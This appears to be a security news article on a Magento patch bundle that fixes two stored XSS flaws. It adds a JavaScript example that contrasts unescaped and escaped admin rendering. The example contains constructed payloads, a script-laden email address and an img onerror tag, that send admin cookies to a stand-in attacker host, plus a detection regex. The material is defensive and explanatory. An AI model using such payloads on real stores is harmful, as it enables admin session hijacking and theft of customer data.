Magento update fixes critical XSS flaws

Magento has released a new security patch bundle that, among other fixes, closes two critical stored XSS vulnerabilities.


In an update last week, the e-commerce platform released a bundle of security fixes, including patches for two issues rated critical.

Both are stored cross-site scripting (XSS) flaws: attacker-supplied script is saved by the store and later executed in an administrator's browser. That lets an attacker hijack an administrator session, escalate privileges, steal customer data and ultimately control the site through its admin accounts.

As Magento is an e-commerce platform, the data at risk includes sensitive customer records, whose theft can lead to problems such as identity theft.

The first vulnerability, affecting almost every install of Magento CE and below, as well as Magento EE and prior versions, can be exploited remotely. All it takes is an email address containing malicious JavaScript, submitted to the store by anyone able to register a customer account or place an order.

Magento does not properly validate this email address and renders it unescaped in the admin panel, so the script executes in the administrator's context when the order is viewed. The code embedded in the address can then steal the administrator's session.

Cybersecurity firm Sucuri says:

“The buggy snippet is located inside Magento core libraries, more specifically within the administrator’s backend. Unless you’re behind a WAF or you have a very heavily modified administration panel, you’re at risk.”

The second bug, also rated critical, was found in order comments. According to Magento, a "specifically crafted request" that goes through the PayFlow Pro payment module can append such a comment to an order.

Because Magento again fails to filter the request, JavaScript can end up saved in the Magento database as part of the order. The script is not run by the server; it executes in the administrator's browser when the order is viewed in the admin panel, and can likewise hijack the session.
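Both bugs follow the same pattern: a value the customer controls (the email address in the first, the order comment in the second) is stored and later written into admin-panel markup without HTML escaping. The following is an added example, not Magento code or Sucuri's proof of concept; the order records, the attacker hostname and the function names are constructed for illustration. It shows the vulnerable rendering beside the escaped version, a stricter email check that rejects quoted local parts, and a test-only heuristic for spotting executable markup in the output.

```javascript
// Added example (not Magento code). Record shapes, hostnames and names
// are hypothetical; the escaping rule is the standard one for HTML text.

// Escape a value for an HTML text/attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Constructed attacker input: a syntactically valid email address whose
// quoted local part carries a script that sends the admin's cookies to an
// attacker-controlled host (attacker.example is made up).
const MALICIOUS_EMAIL =
  '"<script>new Image().src=\'https://attacker.example/c?\'+document.cookie</script>"@example.com';

// Constructed order rows as they might be read back from the database.
const ORDERS = [
  { id: 100000001, customerEmail: "alice@example.com", comment: "Leave at door" },
  { id: 100000002, customerEmail: MALICIOUS_EMAIL, comment: "" },
  { id: 100000003, customerEmail: "bob@example.com",
    comment: '<img src=x onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">' },
];

// Vulnerable pattern: stored values are interpolated straight into the
// admin page, so whatever the attacker saved is parsed as HTML and, for
// <script> or an event handler, executed with the admin's session.
function renderOrderRowUnsafe(order) {
  return `<tr><td>${order.id}</td><td>${order.customerEmail}</td><td>${order.comment}</td></tr>`;
}

// Hardened pattern: every untrusted value is escaped for the context it is
// written into. The payload is still in the database, but the admin's
// browser now displays it as text instead of running it.
function renderOrderRowSafe(order) {
  return `<tr><td>${escapeHtml(order.id)}</td><td>${escapeHtml(order.customerEmail)}</td><td>${escapeHtml(order.comment)}</td></tr>`;
}

// Input-side defence for the email case: accept only a plain local part.
// This is narrower than RFC 5322 (no quoted local parts), which is an
// acceptable trade for a store; it is a complement to output escaping,
// not a substitute, because comments and other fields are free text.
function isAcceptableEmail(email) {
  return /^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/.test(email);
}

// Test-only heuristic: does the rendered markup still contain a script
// tag, an img tag, or a tag carrying an on* event handler? Escaped output
// contains "&lt;" rather than "<", so it never matches.
function containsActiveHtml(markup) {
  return /<script\b|<img\b|<\w+[^>]*\bon\w+\s*=/i.test(markup);
}

function renderAdminOrderGrid(orders, renderRow) {
  return `<table>${orders.map(renderRow).join("")}</table>`;
}

function main() {
  console.log("vulnerable:", renderAdminOrderGrid(ORDERS, renderOrderRowUnsafe));
  console.log("hardened:  ", renderAdminOrderGrid(ORDERS, renderOrderRowSafe));
  console.log("email accepted:", isAcceptableEmail(MALICIOUS_EMAIL));
}

main();
```

The escaping belongs at the point of output, in the admin template, which is why a WAF or a heavily customised admin panel (as Sucuri notes) can change the exposure without touching the underlying data. Marking the admin session cookie HttpOnly blunts the `document.cookie` exfiltration shown here but not every payload an injected script could run.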

More security news

In the latest security update, Magento also fixes other problems, including RSS-based information leaks, susceptibility to brute-force attacks, missing form protection on the Admin Login page that enabled cross-site request forgery, and a denial of service issue in email delivery.

In order to protect websites from exploitation, webmasters should apply the latest patch bundle SUPEE-7405 as soon as possible.

In September last year, researchers discovered a phishing campaign which targeted and managed to infect thousands of WordPress websites with the Nuclear Exploit kit.
